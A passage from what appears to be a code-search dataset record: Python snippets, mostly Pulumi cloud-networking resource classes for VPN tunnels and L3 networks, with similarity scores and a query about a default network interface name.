tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: 
Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionVgwTelemetryArgs']]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if core_network_arn is not None:\n pulumi.set(__self__, \"core_network_arn\", core_network_arn)\n if core_network_attachment_arn is not None:\n pulumi.set(__self__, \"core_network_attachment_arn\", core_network_attachment_arn)\n if customer_gateway_configuration is not None:\n pulumi.set(__self__, \"customer_gateway_configuration\", customer_gateway_configuration)\n if customer_gateway_id is not None:\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if routes is not None:\n pulumi.set(__self__, \"routes\", routes)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transit_gateway_attachment_id\", transit_gateway_attachment_id)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, 
\"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_address is not None:\n pulumi.set(__self__, \"tunnel1_address\", tunnel1_address)\n if tunnel1_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel1_bgp_asn\", tunnel1_bgp_asn)\n if tunnel1_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel1_bgp_holdtime\", tunnel1_bgp_holdtime)\n if tunnel1_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_cgw_inside_address\", tunnel1_cgw_inside_address)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel1_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_vgw_inside_address\", tunnel1_vgw_inside_address)\n if tunnel2_address is not None:\n pulumi.set(__self__, \"tunnel2_address\", tunnel2_address)\n if tunnel2_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel2_bgp_asn\", tunnel2_bgp_asn)\n if 
tunnel2_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel2_bgp_holdtime\", tunnel2_bgp_holdtime)\n if tunnel2_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_cgw_inside_address\", tunnel2_cgw_inside_address)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel2_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_vgw_inside_address\", tunnel2_vgw_inside_address)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if vgw_telemetries is not None:\n pulumi.set(__self__, \"vgw_telemetries\", vgw_telemetries)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
"def network(self):\n return self.__network",
"def ip_protocol(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def __init__(__self__, *,\n extended_location: pulumi.Input['ExtendedLocationArgs'],\n l3_isolation_domain_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n vlan: pulumi.Input[float],\n hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,\n hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,\n interface_name: Optional[pulumi.Input[str]] = None,\n ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,\n ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,\n ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,\n l3_network_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"extended_location\", extended_location)\n pulumi.set(__self__, \"l3_isolation_domain_id\", l3_isolation_domain_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"vlan\", vlan)\n if hybrid_aks_ipam_enabled is None:\n hybrid_aks_ipam_enabled = 'True'\n if hybrid_aks_ipam_enabled is not None:\n pulumi.set(__self__, \"hybrid_aks_ipam_enabled\", hybrid_aks_ipam_enabled)\n if hybrid_aks_plugin_type is None:\n hybrid_aks_plugin_type = 'SRIOV'\n if hybrid_aks_plugin_type is not None:\n pulumi.set(__self__, \"hybrid_aks_plugin_type\", hybrid_aks_plugin_type)\n if interface_name is not None:\n pulumi.set(__self__, \"interface_name\", interface_name)\n if ip_allocation_type is None:\n ip_allocation_type = 'DualStack'\n if ip_allocation_type is not None:\n pulumi.set(__self__, \"ip_allocation_type\", ip_allocation_type)\n if ipv4_connected_prefix is not None:\n pulumi.set(__self__, \"ipv4_connected_prefix\", ipv4_connected_prefix)\n if ipv6_connected_prefix is not None:\n pulumi.set(__self__, \"ipv6_connected_prefix\", ipv6_connected_prefix)\n if l3_network_name is not None:\n pulumi.set(__self__, \"l3_network_name\", l3_network_name)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)",
"def host_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"host_network\")",
"def host_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"host_network\")",
"def network_config(self) -> pulumi.Output['outputs.PrivateCloudNetworkConfig']:\n return pulumi.get(self, \"network_config\")",
"def __init__(__self__, *,\n endpoint_type: pulumi.Input[str],\n resource_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"endpoint_type\", 'HybridConnection')\n if resource_id is not None:\n pulumi.set(__self__, \"resource_id\", resource_id)",
"def _extend_network_dict_provider(self, context, network, bindings=None):\n if 'id' not in network:\n return\n if not bindings:\n bindings = nsx_db.get_network_bindings(context.session,\n network['id'])\n\n # With NSX plugin, \"normal\" overlay networks will have no binding\n if bindings:\n # Network came in through provider networks API\n network[pnet.NETWORK_TYPE] = bindings[0].binding_type\n network[pnet.PHYSICAL_NETWORK] = bindings[0].phy_uuid\n network[pnet.SEGMENTATION_ID] = bindings[0].vlan_id",
"def instance_charge_type(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def _get_network_type(self, host):\n network_type = host.get(\"network\")\n default_network = self.config.get(\"default_network\")\n if network_type is None:\n network_type = self._metadata.get(\"network\", default_network)\n if not network_type:\n raise ProvisioningConfigError(\n \"No network type specified and project doesn't have default \"\n \"network type (property 'default_network') specified in \"\n \"provisioning config.\"\n )\n return network_type",
"def get_network_protocols(self):\n return self.mycam.devicemgmt.GetNetworkProtocols()",
"def get_plugin_description(self):\n return (\"BGP dynamic routing service for announcement of next-hops \"\n \"for private networks and floating IP's host routes.\")",
"def ignore_missing_v_net_service_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_missing_v_net_service_endpoint\")",
"def get_plugin_description(self):\n return constants.L2_GATEWAY_SERVICE_PLUGIN",
"def update_network_plugin_settings(self, mc: ManagedCluster) -> ManagedCluster:\n self._ensure_mc(mc)\n\n network_plugin_mode = self.context.get_network_plugin_mode()\n if network_plugin_mode:\n mc.network_profile.network_plugin_mode = network_plugin_mode\n\n (\n pod_cidr,\n _,\n _,\n _,\n _\n ) = self.context.get_pod_cidr_and_service_cidr_and_dns_service_ip_and_docker_bridge_address_and_network_policy()\n\n network_dataplane = self.context.get_network_dataplane()\n if network_dataplane:\n mc.network_profile.network_dataplane = network_dataplane\n\n if pod_cidr:\n mc.network_profile.pod_cidr = pod_cidr\n return mc",
"def test_support_NETWORK(self):\n self.assertEqual(self._parseFeature(\"NETWORK\", \"IRCNet\"), \"IRCNet\")",
"def spec(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def server_type_name(self):\n ...",
"def _get_nets_other(self, *args, **kwargs):\n\n from warnings import warn\n warn('Whois._get_nets_other() has been deprecated and will be '\n 'removed. You should now use Whois.get_nets_other().')\n return self.get_nets_other(*args, **kwargs)",
"def affectedNet(*args, name: Union[AnyStr, bool]=\"\", type: AnyStr=\"\", q=True, query=True,\n e=True, edit=True, **kwargs)->Union[None, Any]:\n pass",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def get_ui_field_behaviour() -> Dict:\n return {\n \"hidden_fields\": ['schema', 'port', 'extra', 'host'],\n \"relabeling\": {\n 'login': 'Fivetran API Key',\n 'password': 'Fivetran API Secret',\n },\n \"placeholders\": {\n 'login': 'api key',\n 'password': 'api secret',\n },\n }",
"def _get_network_type(self):\n return collections.namedtuple('hyper_dqn_network',\n ['hyp_q_value', 'q_values'])",
"def backend_info(self):\n\t\treturn {'valid': False}",
"def no_device(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"no_device\")",
"def get_connection_form_widgets() -> dict:\n from wtforms import StringField\n from flask_appbuilder.fieldwidgets import BS3TextFieldWidget\n\n return {\n \"extra__ewah_metabase__http_string\": StringField(\n \"Use http instead of https?\",\n widget=BS3TextFieldWidget(),\n )\n }",
"def _get_nets_lacnic(self, *args, **kwargs):\n\n from warnings import warn\n warn('Whois._get_nets_lacnic() has been deprecated and will be '\n 'removed. You should now use Whois.get_nets_lacnic().')\n return self.get_nets_lacnic(*args, **kwargs)",
"def get_network_type(self):\n net_type = self._data['type']\n if net_type == 'Shared':\n return 'guest'\n elif net_type == 'Isolated':\n return 'isolated'",
"def networkInfo(self):\n assert False, \"Deriving class must implement\"",
"def network(self):\n return self._network",
"def network(self):\n return self._network"
] | [
"0.6210376",
"0.5869546",
"0.56280184",
"0.5598459",
"0.5410468",
"0.5071059",
"0.5071059",
"0.49506718",
"0.4947999",
"0.4947999",
"0.4933722",
"0.48782876",
"0.48782876",
"0.48722976",
"0.48536256",
"0.48370484",
"0.4830587",
"0.48199967",
"0.47548893",
"0.47461218",
"0.4742187",
"0.4742187",
"0.4742187",
"0.4742187",
"0.4742187",
"0.47228116",
"0.4718932",
"0.4709614",
"0.47058436",
"0.47058436",
"0.47057506",
"0.470357",
"0.47027013",
"0.46833074",
"0.46810114",
"0.46810114",
"0.46685338",
"0.46415558",
"0.46412367",
"0.46386924",
"0.46350864",
"0.46277723",
"0.46200517",
"0.46133053",
"0.46007362",
"0.45920748",
"0.45888147",
"0.458866",
"0.45826578",
"0.45826578",
"0.45826578",
"0.45784494",
"0.45585415",
"0.45572534",
"0.4556415",
"0.4555404",
"0.45422706",
"0.4538289",
"0.4524146",
"0.45234737",
"0.45215735",
"0.4521274",
"0.45179993",
"0.45156115",
"0.45086312",
"0.45086312",
"0.45085144",
"0.45082542",
"0.45071143",
"0.45057335",
"0.45041972",
"0.45024002",
"0.45016608",
"0.449903",
"0.449903",
"0.44292885",
"0.44253752",
"0.44236755",
"0.4419574",
"0.44128957",
"0.44118938",
"0.44092673",
"0.44032365",
"0.4396175",
"0.4381917",
"0.43787315",
"0.4373876",
"0.43719837",
"0.43702766",
"0.43654287",
"0.43649706",
"0.4363567",
"0.43633303",
"0.4357884",
"0.43523285",
"0.43490407",
"0.4345067",
"0.43443552",
"0.43397117",
"0.43387595",
"0.43387595"
] | 0.0 | -1 |
The default interface name for this L3 network in the virtual machine. This name can be overridden by the name supplied in the network attachment configuration of that virtual machine. | def interface_name(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "interface_name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def interface_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"interface_name\")",
"def l3_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"l3_network_name\")",
"def interface_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"interface_name\")",
"def network_interface_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_interface_id\")",
"def get_interface_name():\n interface_name = ''\n interfaces = psutil.net_if_addrs()\n for name, details in interfaces.items():\n for detail in details:\n if detail.family == socket.AF_INET:\n ip_address = ipaddress.ip_address(detail.address)\n if not (ip_address.is_link_local or ip_address.is_loopback):\n interface_name = name\n break\n return interface_name",
"def _get_interface_name(self):\n return self.__interface_name",
"def getDefaultLayerName(self):\n\t\treturn self._fileSystem.getDefaultLayerName()",
"def _get_ifname(self, intf_type, interface):\n if intf_type == 'port':\n ifname = 'Ethernet' + str(interface)\n elif intf_type == 'portchannel':\n ifname = 'po' + str(interface)\n else:\n raise Exception(\"Unknown interface type: \" + intf_type)\n\n return ifname",
"def get_logical_ifname(self, interface_name, proto='provision'): # pragma: no cover\n output = check_output(['uci', 'show', 'network'])\n network_list = output.strip().split('\\n')\n for config in network_list:\n cfg, option = config.split('=')\n net_prex = cfg.split(\".\")\n if net_prex[-1] == \"proto\" and str(option) != proto:\n ifname = '.'.join(net_prex[:-1]) + '.ifname'\n interface = check_output(['uci', 'get', ifname]).split('\\n')[0]\n if interface == interface_name:\n return net_prex[1]\n return ''",
"def get_default_config(self):\n if not self.iface_type:\n return None\n\n defaults = {}\n defaults['description'] = self.interface_name + ' Interface'\n defaults['admin'] = 'up'\n if self.is_ethernet:\n defaults['speed'] = 'auto'\n defaults['duplex'] = 'auto'\n defaults['type'] = 'bridged'\n elif self.iface_type == 'Bridge-Aggregation':\n defaults['type'] = 'bridged'\n else:\n defaults['type'] = 'routed'\n\n return defaults",
"def get_interface_name(self, network, port=None):\n if not port:\n device_id = self.get_device_id(network)\n port = self.plugin.get_dhcp_port(network.id, device_id)\n return self.driver.get_device_name(port)",
"def getDefaultName(self): # real signature unknown; restored from __doc__\n pass",
"def network_interface(self): \n return self._network_interface",
"def default_ip(ifname):\n ipr = IPRoute()\n index = ipr.link_lookup(ifname=ifname)[0]\n addr = ipr.get_addr(index=index)[0]\n interface = ipaddress.ip_interface('{}/{}'.format(addr.get_attr('IFA_ADDRESS'), addr['prefixlen']))\n addr = interface.ip + 1\n if addr in interface.network:\n return str(addr)\n raise TypeError(f'Unable to calculate default node ip in {ifname} ({interface})')",
"def managed_network_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"managed_network_name\")",
"def moc_vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"moc_vnet_name\")",
"def GetInterface(self):\n ifname = self.interface_watcher.get_last_ifname()\n if ifname is None:\n ifname = ''\n logger.debug('Replying \"' + ifname + '\" to D-Bus request GetInterface')\n return ifname",
"def get_default_iface_name_linux():\n route = \"/proc/net/route\"\n with open(route) as f:\n for line in f.readlines():\n try:\n iface, dest, _, flags, _, _, _, _, _, _, _, = line.strip().split()\n if dest != '00000000' or not int(flags, 16) & 2:\n continue\n return iface\n except:\n continue",
"def get_default_ip():\r\n if CONFIG.BIND_INTERFACE is None:\r\n default_gw = netifaces.gateways()['default']\r\n if netifaces.AF_INET in default_gw:\r\n preferred_interface = default_gw[netifaces.AF_INET][1]\r\n else:\r\n interfaces = netifaces.interfaces()\r\n preferred_interface = next((i for i in interfaces if i != 'lo'), interfaces[0])\r\n else:\r\n preferred_interface = CONFIG.BIND_INTERFACE\r\n return netifaces.ifaddresses(preferred_interface)[netifaces.AF_INET][0]['addr']",
"def cloud_services_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cloud_services_network_name\")",
"def get_network_name(self): # type: () -> str\n networks = self.get_network_names()\n\n if not networks:\n raise ApplicationError('No network found for Docker container: %s.' % self.id)\n\n if len(networks) > 1:\n raise ApplicationError('Found multiple networks for Docker container %s instead of only one: %s' % (self.id, ', '.join(networks)))\n\n return networks[0]",
"def default_name(self):\n return '[' + self.__class__.__name__ + ']'",
"def computer_network_name(self) -> str:\n return self._computer_network_name",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def interviewer_name_default(self, interviewer_name_default):\n\n self._interviewer_name_default = interviewer_name_default",
"def default_name(self):\n name = f\"Player {self.UID.split('-')[0]}\"\n return name",
"def vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"vnet_name\")",
"def get_network_default_gateway(self):\n return self.mycam.devicemgmt.GetNetworkDefaultGateway()",
"def get_name(self):\n \n return 'Socket/IP'",
"def network_watcher_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_watcher_name\")",
"def network_name(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"network_name\"), kwargs)",
"def get_interface(self, ifname):\n \n return self._ifname",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def get_default_ip_address():\r\n gws = netifaces.gateways() # get all gateways\r\n default = gws['default'] # get the default gw\r\n adapter = default[2][1] # get the adapter identifier\r\n realadapter = netifaces.ifaddresses(adapter) # get the adapter\r\n addr_dict = realadapter[2][0] # get the first ipv4 address tuple\r\n return addr_dict['addr']",
"def name(self) -> str:\n return self.config_name or self.host_name or self.dev_id or DEVICE_DEFAULT_NAME",
"def vnet_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"vnet_name\")",
"def get_network_name_on_vc(options):\n network = get_network_on_vc(options)\n if network:\n return network.name",
"def default_interface(dut,**kwargs):\n cli_type = st.get_ui_type(dut, **kwargs)\n\n if 'interface' not in kwargs:\n st.error(\"Mandatory arg interface is not present\")\n return False\n else:\n interface = kwargs['interface']\n\n skip_error = kwargs.pop('skip_error', False)\n command = ''\n\n if cli_type == 'klish':\n if 'range' in kwargs:\n command = command + \"\\n\" + \"default interface range {}\".format(interface)\n else:\n command = command + \"\\n\" + \"default interface {}\".format(interface)\n else:\n st.error(\"Invalid cli_type for this API - {}.\".format(cli_type))\n return False\n\n st.config(dut, command, type='klish',skip_error_check=skip_error)\n return True",
"def network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_id\")",
"def name(self):\n if self._name == '':\n return self.default_name\n else:\n return self._name",
"def name(self) -> str:\n return f\"{self._inst} NAT {self._data['name']}\"",
"def test_get_default_network(self):\n pass",
"def get_interface(\n network: Union[ipaddress.IPv6Interface, ipaddress.IPv4Interface, str], index: int\n) -> Union[ipaddress.IPv6Interface, ipaddress.IPv4Interface]:\n if isinstance(network, str):\n network = ipaddress.ip_network(network)\n\n host = network[index]\n return ipaddress.ip_interface(f\"{host}/{network.prefixlen}\")",
"def default_label(self) -> str:\n return self.settings[\"default_label\"]",
"def attached_network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"attached_network_id\")",
"def GetWirelessInterface(self):\n return str(self.wifi.wireless_interface)",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def get_interface_name(self, device, ipaddress, parser_obj=None):\n\n # Calling parser\n try:\n parsed_output = parser_obj.parse(ip=ipaddress)\n except SchemaEmptyParserError:\n # We are looping over all the ips provided in the testbed yaml file\n # Show command output will be empty in some cases.\n return None\n\n # Get the corresponding interface name\n for intf in parsed_output['interface'].keys():\n # Parser structure only has one interface\n interface_name = intf\n\n return interface_name",
"def set_interface(interface, name=''):\n if not interface:\n raise ValueError('interface is empty')\n\n global interfaces\n logger.debug('connection_name: \"{}\" -> {}.{}'.format(\n name,\n interface.__module__,\n interface.__class__.__name__\n ))\n interfaces[name] = interface",
"def get_default_vnchost_name(self):\n\t\treturn call_sdk_function('PrlDispCfg_GetDefaultVNCHostName', self.handle)",
"def network_fabric_controller_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_fabric_controller_name\")",
"def convert_interface_name(self, s):\n match = self.rx_interface_name.match(s)\n if not match:\n return s\n else:\n return \"DryContact %s\" % s",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def filename(self):\n return f'{self._peer.interface}.conf'",
